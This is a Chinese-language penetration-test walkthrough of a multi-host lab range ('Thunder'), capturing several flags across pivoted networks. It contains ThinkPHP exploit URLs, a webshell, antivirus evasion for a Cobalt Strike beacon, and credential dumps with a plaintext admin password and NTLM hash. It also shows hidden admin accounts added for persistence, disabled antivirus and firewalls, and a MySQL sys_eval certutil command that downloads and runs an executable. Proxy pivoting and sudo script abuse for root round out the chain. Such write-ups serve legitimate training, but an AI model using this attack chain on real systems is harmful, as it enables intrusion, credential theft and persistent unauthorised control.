靶机渗透-Thunder-记录
flag1
TP RCE
[+] http://172.20.56.32 的检测结果如下:
=====================================================================
[-] 目标不存在tp5_debug_index_ids_sqli漏洞
[-] 目标不存在tp_update_sql漏洞
[-] 目标不存在tp5_index_construct_rce漏洞
[-] 目标不存在tp5_construct_debug_rce漏洞
[+] 目标存在tp5_dbinfo_leak漏洞, payload:
http://172.20.56.32?s=index/think\config/get&name=database.hostname
hostname: 127.0.0.1, hostport: , database: , username: , password: root
[-] 目标不存在tp2_lite_code_exec漏洞
[-] 目标不存在tp5_invoke_func_code_exec_2漏洞
[-] 目标不存在tp5_construct_code_exec_3漏洞
[-] 目标不存在tp5_method_filter_code_exec漏洞
[-] 目标不存在tp5_construct_code_exec_2漏洞
[-] 目标不存在tp_cache漏洞
[-] 目标不存在tp5_construct_code_exec_4漏洞
[-] 目标不存在tp5_construct_code_exec_1漏洞
[-] 目标不存在tp_view_recent_xff_sqli漏洞
[-] 目标不存在tp5_driver_display_rce漏洞
[-] 目标不存在tp_pay_orderid_sqli漏洞
[-] 目标不存在tp6_session_file_write漏洞
[-] 目标不存在tp_checkcode_time_sqli漏洞
[-] 目标不存在tp5_templalte_driver_rce漏洞
[-] 目标不存在tp5_index_showid_rce漏洞
[-] 目标不存在tp5_session_include漏洞
[-] 目标不存在tp_multi_sql_leak漏洞
[-] 目标不存在tp5_request_input_rce漏洞
[+] 目标存在tp5_file_include漏洞, payload:
http://172.20.56.32?s=index/\think\Lang/load&file=C:\windows\win.ini
[+] 目标存在tp5_invoke_func_code_exec_1漏洞

nt authority\local service
nt authority\local service
dir C:\
2025/01/21 14:59 <DIR> 360Downloads
2025/01/21 14:38 479 flag.txt
2016/07/16 21:23 <DIR> PerfLogs
2025/01/21 13:43 <DIR> phpStudy
2016/12/14 19:06 <DIR> Program Files
2025/01/31 10:29 <DIR> Program Files (x86)
2025/01/21 13:40 <DIR> Users
2025/01/21 14:08 <DIR> Windows
type C:\flag.txt
) ) ( (
* ) ( /( ( /( )\ ) )\ )
` ) /( )\()) ( )\())(()/( ( (()/(
( )(_))((_)\ )\ ((_)\ /(_)) )\ /(_))
(_(_()) _((_) _ ((_) _((_)(_))_ ((_) (_))
|_ _| | || || | | || \| | | \ | __|| _ \
| | | __ || |_| || .` | | |) || _| | /
|_| |_||_| \___/ |_|\_| |___/ |___||_|_\
go-flag{137ee666-7623-4550-85bd-e8163d91c9b0}
flag2
查看杀软,有360主动防御。
tasklist /SVC
系统进程 杀软名称
360rps.exe Qihoo-360
ZhuDongFangYu.exe 360安全卫士-主动防御
MsMpEng.exe Microsoft Security Essentials
360tray.exe 360安全卫士-实时保护
360sd.exe 360杀毒
360rp.exe 360杀毒
MpCmdRun.exe Windows Defender Antivirus
C:/phpStudy/WWW/public/static/ >ipconfig
Windows IP 配置
以太网适配器 以太网实例 0:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::d19d:b26b:a54e:c597%16
IPv4 地址 . . . . . . . . . . . . : 172.20.56.32
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 172.20.56.233
以太网适配器 以太网实例 2:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::1d42:8b49:69d9:3c54%17
IPv4 地址 . . . . . . . . . . . . : 172.20.57.30
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 172.20.57.1
隧道适配器 isatap.{DF359468-7753-400C-AE4C-A17B3672A32A}:
媒体状态 . . . . . . . . . . . . : 媒体已断开连接
连接特定的 DNS 后缀 . . . . . . . :
隧道适配器 isatap.{C0CFE62E-3EAD-44FF-A1EE-892111C1D636}:
媒体状态 . . . . . . . . . . . . : 媒体已断开连接
连接特定的 DNS 后缀 . . . . . . . :
getshell【哥斯拉】
http://172.20.56.32/static/2.php
phpinfo()
PHP Version 5.4.45
C:/phpStudy/WWW/public/static/ >net user
\\ 的用户帐户
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
传fscan扫
[+] 端口开放 172.20.57.98:3306
[+] 端口开放 172.20.57.30:3306
[+] 端口开放 172.20.57.98:445
[+] 端口开放 172.20.57.30:445
[+] 端口开放 172.20.57.98:139
[+] 端口开放 172.20.57.30:139
[+] 端口开放 172.20.57.98:135
[+] 端口开放 172.20.57.30:135
[+] 端口开放 172.20.57.30:80
[*] NetInfo
[*] 172.20.57.30
[->] WIN-BCQDCARVJPJ
[->] 172.20.56.32
[->] 172.20.57.30
[*] 网站标题 http://172.20.57.30 状态码:200 长度:931 标题:无标题
[*] NetInfo
[*] 172.20.57.98
[->] WIN-J2B9EIUKEN3
[->] 172.20.57.98
[->] 10.0.0.65
[*] NetBios 172.20.57.98 WORKGROUP\WIN-J2B9EIUKEN3 Windows Server 2016 Standard 14393
[+] [发现漏洞] 目标: http://172.20.57.30
漏洞类型: poc-yaml-thinkphp5-controller-rce
漏洞名称:
详细信息: %!s(<nil>)
[+] 端口开放 172.20.56.233:8080
[+] 端口开放 172.20.56.32:3306
[+] 端口开放 172.20.56.32:445
[+] 端口开放 172.20.56.32:139
[+] 端口开放 172.20.56.32:135
[+] 端口开放 172.20.56.32:80
[+] 端口开放 172.20.56.233:22
[*] NetInfo
[*] 172.20.56.32
[->] WIN-BCQDCARVJPJ
[->] 172.20.56.32
[->] 172.20.57.30
[*] 网站标题 https://172.20.56.233:8080 状态码:404 长度:19 标题:无标题
[*] 网站标题 http://172.20.56.32 状态码:200 长度:931 标题:无标题
[+] [发现漏洞] 目标: http://172.20.56.32
漏洞类型: poc-yaml-thinkphp5-controller-rce
漏洞名称:
详细信息: %!s(<nil>)
权限是nt authority\local service,先CS上线之后提权,因为有360主动防御,所以需要做一下免杀。生成C的payload用掩日试一下。

成功上线,使用sweet-potato进行提权为SYSTEM

抓密码
Authentication Id : 0 ; 401220 (00000000:00061f44)
Session : Interactive from 1
User Name : Administrator
Domain : WIN-BCQDCARVJPJ
Logon Server : WIN-BCQDCARVJPJ
Logon Time : 2025/2/4 1:34:34
SID : S-1-5-21-3032252582-605398383-1541951267-500
msv :
[00000005] Primary
* Username : Administrator
* Domain : WIN-BCQDCARVJPJ
* NTLM : 744bf4af8b4e9eb0dfe9ced60cc29db3
* SHA1 : 5b161cec6486a0722bf3f7af5ac4a9bbc50663ce
tspkg :
wdigest :
* Username : Administrator
* Domain : WIN-BCQDCARVJPJ
* Password : (null)
kerberos :
* Username : Administrator
* Domain : WIN-BCQDCARVJPJ
* Password : (null)
ssp :
credman :
[00000000]
* Username : WIN-BCQDCARVJPJ\Administrator
* Domain : WIN-BCQDCARVJPJ\Administrator
* Password : Tp@cslKM
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WIN-BCQDCARVJPJ$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2025/2/4 1:33:53
SID : S-1-5-20
msv :
tspkg :
wdigest :
* Username : WIN-BCQDCARVJPJ$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : win-bcqdcarvjpj$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2025/2/4 1:33:55
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 77379 (00000000:00012e43)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/2/4 1:33:55
SID : S-1-5-90-0-1
msv :
tspkg :
wdigest :
* Username : WIN-BCQDCARVJPJ$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 77359 (00000000:00012e2f)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/2/4 1:33:55
SID : S-1-5-90-0-1
msv :
tspkg :
wdigest :
* Username : WIN-BCQDCARVJPJ$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 33071 (00000000:0000812f)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2025/2/4 1:33:52
SID :
msv :
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WIN-BCQDCARVJPJ$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2025/2/4 1:33:51
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WIN-BCQDCARVJPJ$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : win-bcqdcarvjpj$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
开启RDP之后连接
[*] Tasked beacon to run: REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
[*] Tasked beacon to run: wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
[+] host called home, sent: 244 bytes
[+] received output:
操作成功完成。
[+] received output:
执行(\\WIN-BCQDCARVJPJ\ROOT\CIMV2\TerminalServices:Win32_TerminalServiceSetting.ServerName="WIN-BCQDCARVJPJ")->SetAllowTSConnections()
方法执行成功。
外参数:
instance of __PARAMETERS
{
ReturnValue = 0;
};

加入隐藏用户并加入管理组,进行权限维持
shell net user test okm@123 /add
shell net localgroup administrators test /add
连接RDP之后关闭360主动防御,为后渗透提供便利。同时因为我是用的ubuntu的openvpn,本机用frp也代理出来,然后爆破一下上边搜集到的俩3306数据库,提示密码了
提示:目标喜欢逛cyberstrikelab平台,喜欢用cslab作为账号密码
[+] 端口开放 172.20.57.98:3306
[+] 端口开放 172.20.57.30:3306

2025/2/4 2:37:58----172.20.57.98-----MySQL----root----cslab----5.7.44-log----成功!
mysql考虑UDF提权,直接梭,需要再搭建一层代理,是这个TP的边缘机和ubuntu之间的代理。
#ubuntu
./admin_linux_x64 -rhost 172.20.56.32 -rport 1111
#TP边缘机
agent.exe -lport 1111
#ubuntu设置socks代理
(admin node) >>> show
A
+ -- 1
(admin node) >>> goto 1
node 1
(node 1) >>> socks 2222
a socks5 proxy of the target node has started up on the local port 2222.
结合proxyfier

成功获取98机器的shell,权限为nt authority\network service,依然是windows机器

Windows IP 配置
以太网适配器 以太网实例 0:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::f57a:3cc6:fa1f:544a%15
IPv4 地址 . . . . . . . . . . . . : 172.20.57.98
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 172.20.57.1
以太网适配器 以太网实例 2:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::a8d8:f91e:c558:501f%14
IPv4 地址 . . . . . . . . . . . . : 10.0.0.65
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 10.0.0.1
隧道适配器 isatap.{88F0BDFA-1D9B-4F51-B42D-8F38C5C6FBD3}:
媒体状态 . . . . . . . . . . . . : 媒体已断开连接
连接特定的 DNS 后缀 . . . . . . . :
隧道适配器 isatap.{85CBBCF4-0797-42B6-8065-7F9CFC440E47}:
媒体状态 . . . . . . . . . . . . : 媒体已断开连接
连接特定的 DNS 后缀 . . . . . . . :
先来查看一下机器杀软情况,是微软的 Defender
系统进程 | 杀软名称 |
---|---|
MsMpEng.exe | Microsoft Security Essentials |
MpCmdRun.exe | Windows Defender Antivirus |
flag2同样也在C盘根目录,不过读不了,应该是权限问题,先考虑上线提权

尝试直接利用ubuntu机器远程下载CS马,还是先用掩日免杀试试,用certutil命令下载,因为这个98机器和ubuntu是不通的,所以把exe放到边缘机的web服务下来远程下载
certutil是windows的一款下载文件的工具,自从WindowsServer2003就自带,但是在Server 2003使用会有问题,也就是说,该命令是在Win7及其以后的机器中使用。其功能可校验文件MD5,SHA1,SHA256,下载恶意文件和免杀
select sys_eval("certutil.exe -urlcache -split -f http://172.20.57.30/FSz.exe");
select sys_eval("FSz.exe http://172.20.57.30/FSz.txt");
下载之后就被杀了,用掩日进行分离免杀,采用网络分离。

传上去了,活的很好,尝试执行,这里没上线,还是因为内网问题,并不能直接回弹到ubuntu的CS。虽然98机器开着445,可以考虑用psexec来进行横向传递,但是并不知道这个98机器的管理员账密,尝试无果,最终考虑使用pystinger进行代理转发来进行上线。
#上传proxy.php到边缘机
访问回显UTF-8
#上传stinger_server.exe,执行
start stinger_server.exe 0.0.0.0
#攻击机上执行
./stinger_client -w http://172.20.56.32/static/proxy.php -l 127.0.0.1 -p 60000
[此时已经将web服务器的60020端口转发到vps的60020端口上了]
#CS设置监听,HTTP Hosts为中转机器的内网ip即172.20.57.30[这里要注意因为是双网卡,不注意可能用56的,肯定是不通的],端口为60020
#直接生成payload正常进行免杀点击就会上线CS
还是使用sweet-potato进行提权至SYSTEM

读取根目录下的flag

go-flag{2e4eb283-bb22-4c40-91ec-07f158859af9}
flag3
同样的思路先开启3389,抓密码,密码抓了个寂寞
Authentication Id : 0 ; 52510 (00000000:0000cd1e)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/2/4 7:21:05
SID : S-1-5-90-0-1
msv :
tspkg :
wdigest :
* Username : WIN-J2B9EIUKEN3$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WIN-J2B9EIUKEN3$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2025/2/4 7:21:04
SID : S-1-5-20
msv :
tspkg :
wdigest :
* Username : WIN-J2B9EIUKEN3$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : win-j2b9eiuken3$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 24623 (00000000:0000602f)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2025/2/4 7:21:03
SID :
msv :
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2025/2/4 7:21:05
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 52485 (00000000:0000cd05)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/2/4 7:21:05
SID : S-1-5-90-0-1
msv :
tspkg :
wdigest :
* Username : WIN-J2B9EIUKEN3$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WIN-J2B9EIUKEN3$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2025/2/4 7:21:03
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WIN-J2B9EIUKEN3$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : win-j2b9eiuken3$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
小插曲,有段时间突然这台机器突然掉线了,重复以上操作一直不能再上线,发现是之前的马一直在占用进程,需要先强制kill了
taskkill /im 3.exe /f
加用户管理组,权限维持
shell net user test okm@123 /add
shell net localgroup administrators test /add
远程连接,然后一键三连关闭

上边也已经知道这个机器同样是双网卡,传上去fscan扫一下10.0.0.0/24
fscan.exe -h 172.20.57.0/24
[+] 端口开放 172.20.57.98:445
[+] 端口开放 172.20.57.30:445
[+] 端口开放 172.20.57.30:139
[+] 端口开放 172.20.57.98:139
[+] 端口开放 172.20.57.98:135
[+] 端口开放 172.20.57.30:135
[+] 端口开放 172.20.57.30:80
[+] 端口开放 172.20.57.98:3306
[+] 端口开放 172.20.57.30:3306
[*] NetInfo
[*] 172.20.57.30
[->] WIN-BCQDCARVJPJ
[->] 172.20.56.32
[->] 172.20.57.30
[*] 网站标题 http://172.20.57.30 状态码:200 长度:931 标题:无标题
[*] NetInfo
[*] 172.20.57.98
[->] WIN-J2B9EIUKEN3
[->] 172.20.57.98
[->] 10.0.0.65
[*] NetBios 172.20.57.30 WORKGROUP\WIN-BCQDCARVJPJ Windows Server 2016 Datacenter 14393
[+] [发现漏洞] 目标: http://172.20.57.30
漏洞类型: poc-yaml-thinkphp5-controller-rce
漏洞名称:
详细信息: %!s(<nil>)
fscan.exe -h 10.0.0.0/24
[+] 端口开放 10.0.0.65:3306
[+] 端口开放 10.0.0.65:445
[+] 端口开放 10.0.0.65:139
[+] 端口开放 10.0.0.65:135
[+] 端口开放 10.0.0.34:80
[+] 端口开放 10.0.0.34:22
[*] NetInfo
[*] 10.0.0.65
[->] WIN-J2B9EIUKEN3
[->] 172.20.57.98
[->] 10.0.0.65
发现有个80端口的服务,是ZBlog1.7.3

使用ew进行80端口的端口转发,代理出来
ew_for_Win.exe -s lcx_tran -l 5000 -f 10.0.0.34 -g 80
lcx_tran 0.0.0.0:5000 <--[10000 usec]--> 10.0.0.34:80

现在直接访问http://172.20.57.98:5000/即是该web服务
http://172.20.57.98:5000/zb_system/login.php
数据库就在98机器里

所以可以直接通过数据库来篡改密码
/**
* 静态方法,获取加盐及二次散列的,用于保存的最终密码
*
* @param string $ps 明文密码
* @param string $guid 用户唯一码
*
* @return string
*/
public static function GetPassWordByGuid($ps, $guid)
{
return md5(md5($ps) . $guid);
}
123456=30492f76a0fbcf3906cce8b4b566d6b6

cslab/123456,进入后台

Z-Blog后台文件上传漏洞,影响版本1.7.3及以下 系统对主题文件代码没有做审查,导致将恶意代码写入主题文件后,被系统生成为文件。黑客可以利用这个漏洞,将恶意代码生成至网站目录,而后通过工具完全控制其主机。
http://172.20.57.98:5001/zb_users/theme/shell/template/shelll.php
pass

#/home/www/write.sh
#!/bin/bash
if [ "$#" -ne 2 ]; then
echo "Usage: \$0 <read_file> <append_file>"
exit 1
fi
read_file="$1"
append_file="$2"
if [ ! -r "$read_file" ]; then
echo "Error: Cannot read file '$read_file'. Please check if the file exists and you have read permissions."
exit 1
fi
if [ -e "$append_file" ] && [ ! -w "$append_file" ]; then
echo "Error: Cannot write to '$append_file'. Please check if the file is writable."
exit 1
fi
target_dir=$(dirname "$append_file")
if [ ! -d "$target_dir" ]; then
echo "Error: Directory '$target_dir' does not exist. Please create it before running the script."
exit 1
fi
if cat "$read_file" >> "$append_file"; then
echo "Content from '$read_file' has been appended to '$append_file'."
else
echo "Error: Failed to append content to '$append_file'. Please check write permissions."
exit 1
fi
这个文件直接有root,所以直接修改文件内容来执行命令获取flag
(www:/home/www) $ sudo -l
Matching Defaults entries for www on localhost:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User www may run the following commands on localhost:
(ALL) NOPASSWD: /home/www/write.sh

(www:/home/www) $ sudo ./write.sh
anaconda-ks.cfg
flag.txt
Usage: $0 <read_file> <append_file>
(www:/home/www) $ sudo ./write.sh
anaconda-ks.cfg
flag.txt
) ) ( (
* ) ( /( ( /( )\ ) )\ )
` ) /( )\()) ( )\())(()/( ( (()/(
( )(_))((_)\ )\ ((_)\ /(_)) )\ /(_))
(_(_()) _((_) _ ((_) _((_)(_))_ ((_) (_))
|_ _| | || || | | || \| | | \ | __|| _ \
| | | __ || |_| || .` | | |) || _| | /
|_| |_||_| \___/ |_|\_| |___/ |___||_|_\
go-flag{D955C315-BF6D-45FD-B342-4E8B1DE76329}
flag4
继续查看网络配置
(www:/home/www) $ ip add
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether e0:8a:8a:80:75:c5 brd ff:ff:ff:ff:ff:ff
inet 10.0.0.34/24 scope global ens3
valid_lft forever preferred_lft forever
inet6 fe80::e28a:8aff:fe80:75c5/64 scope link
valid_lft forever preferred_lft forever
3: ens6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether a0:de:87:04:b1:ab brd ff:ff:ff:ff:ff:ff
inet 10.1.1.78/24 scope global ens6
valid_lft forever preferred_lft forever
inet6 fe80::a2de:87ff:fe04:b1ab/64 scope link
valid_lft forever preferred_lft forever
发现还有10.1段的网络,fscan太大蚁剑不好传,写个冰蝎马

./fscan -h 10.1.1.0/24
[+] 端口开放 10.1.1.56:443
[+] 端口开放 10.1.1.78:80
[+] 端口开放 10.1.1.56:22
[+] 端口开放 10.1.1.78:22
[+] 端口开放 10.1.1.56:7071
[+] 端口开放 10.1.1.56:8443
[+] 端口开放 10.1.1.56:11211
[*] 网站标题 http://10.1.1.78 状态码:200 长度:7121 标题:Good Luck To You! - cyberstrikelab
[+] Memcached 10.1.1.56:11211 未授权访问
再用venom二次代理
node 1>listen 777
agent.exe -rhost 172.20.57.30 -rport 777
node 2>listen 777
./agent_linux_x64 -rhost 10.0.0.65 -rport 777
(node 3) >>> show
A
+ -- 1
+ -- 2
+ -- 3
(node 3) >>>
linux开启firewalld了,先关闭
systemctl stop firewalld
systemctl status firewalld
这里可以看到已经关闭了
● firewalld.service - firewalld - dynamic firewall daemon
Loaded: loaded (/usr/lib/systemd/system/firewalld.service; enabled; vendor preset: enabled)
Active: inactive (dead) since Tue 2025-02-04 15:23:10 CST; 4h 54min ago
Docs: man:firewalld(1)
Process: 664 ExecStart=/usr/sbin/firewalld --nofork --nopid $FIREWALLD_ARGS (code=exited, status=0/SUCCESS)
Main PID: 664 (code=exited, status=0/SUCCESS)
Feb 04 15:23:03 localhost.localdomain systemd[1]: Starting firewalld - dynamic firewall daemon...
Feb 04 15:23:05 localhost.localdomain systemd[1]: Started firewalld - dynamic firewall daemon.
Feb 04 15:23:05 localhost.localdomain firewalld[664]: WARNING: AllowZoneDrifting is enabled. This is considered an insecure configuration option. It will be removed in a future release. Please consider disabling it now.
Feb 04 15:23:09 localhost.localdomain systemd[1]: Stopping firewalld - dynamic firewall daemon...
Feb 04 15:23:10 localhost.localdomain systemd[1]: Stopped firewalld - dynamic firewall daemon.
是Zimbra XXE SSRF,直接复现即可
参考链接
Zimbra xxe+ssrf导致getshell_zimbra getshell-CSDN博客
【内网—内网转发】——代理转发_ew(Earthworm)代理转发_ew代理-CSDN博客
zimbra攻防笔记-XXE+SSRF RCE – NooEmotionの摆烂屋